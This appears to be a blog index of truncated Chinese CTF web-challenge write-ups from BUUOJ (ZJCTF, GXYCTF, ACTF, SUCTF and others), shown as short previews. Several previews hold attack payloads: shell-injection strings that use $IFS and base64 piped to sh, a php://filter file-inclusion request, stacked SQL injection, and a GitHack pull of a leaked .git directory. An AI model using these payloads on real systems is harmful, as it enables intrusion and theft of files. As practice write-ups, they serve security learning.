-
ZJCTF2019
[ZJCTF 2019]NiZhuanSiWei12345678910111213141516171819<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file... -
Liu ✌最帅
转换域名的Liu✌天外来助
-
网鼎杯2020青龙组
[网鼎杯 2020 青龙组]AreUSerialz一个反序列化 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081<?phpincl... -
HCTF2018
[HCTF 2018]WarmUp查看源码/source.php 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950<?php highlight_file(__FILE__); class emmm { publ... -
MRCTF2020
[MRCTF2020]Ezpop123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https:... -
BJDCTF2020
[BJDCTF2020]Mark loves cat进去之后是一个网页,怀疑是git泄露,因为挺多这样拿源码的而且题目是个cat 1python GitHack.py http://a2ea6e9a-3c74-4806-be7c-911267a2c810.node5.buuoj.cn:81/.git flag.php是一个普通的开文件的没啥用,源码如下 123456789101112131... -
GXYCTF2019
[GXYCTF2019]Ping Ping Ping一个RCE 12345?ip=127.0.0.1;ls?ip=127.0.0.1;nl$IFS$1`ls`?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh [GXYCTF2019]禁止套娃扫描后台,状... -
RoarCTF2019
[RoarCTF 2019]Easy Calc查看源码 123456789101112131415161718<!--I've set up WAF to ensure security.--><script> $('#calc').submit(function(){ $.ajax({ ... -
ACTF2020新生赛
[ACTF2020 新生赛]Exec一个非常简单的命令执行 12;ls /;tac /f* [ACTF2020 新生赛]Include随便怎么打都通,vps远程包含,filter协议等等 1?file=php://filter/convert.base64-encode/resource=flag.php [ACTF2020 新生赛]BackupFile题目提示直接访问/index.ph... -
SUCTF2019
[SUCTF 2019]EasySQL堆叠注入首先查表 11;show tables; 如何查flag呢,猜测后端语句为 1select $post['query']||flag from Flag 那么涉及特性 SQL_MOD:是MySQL支持的基本语法、校验规则其中PIPES_AS_CONCAT:会将||认为字符串的连接符,而不是或运算符,这时||符号就像con...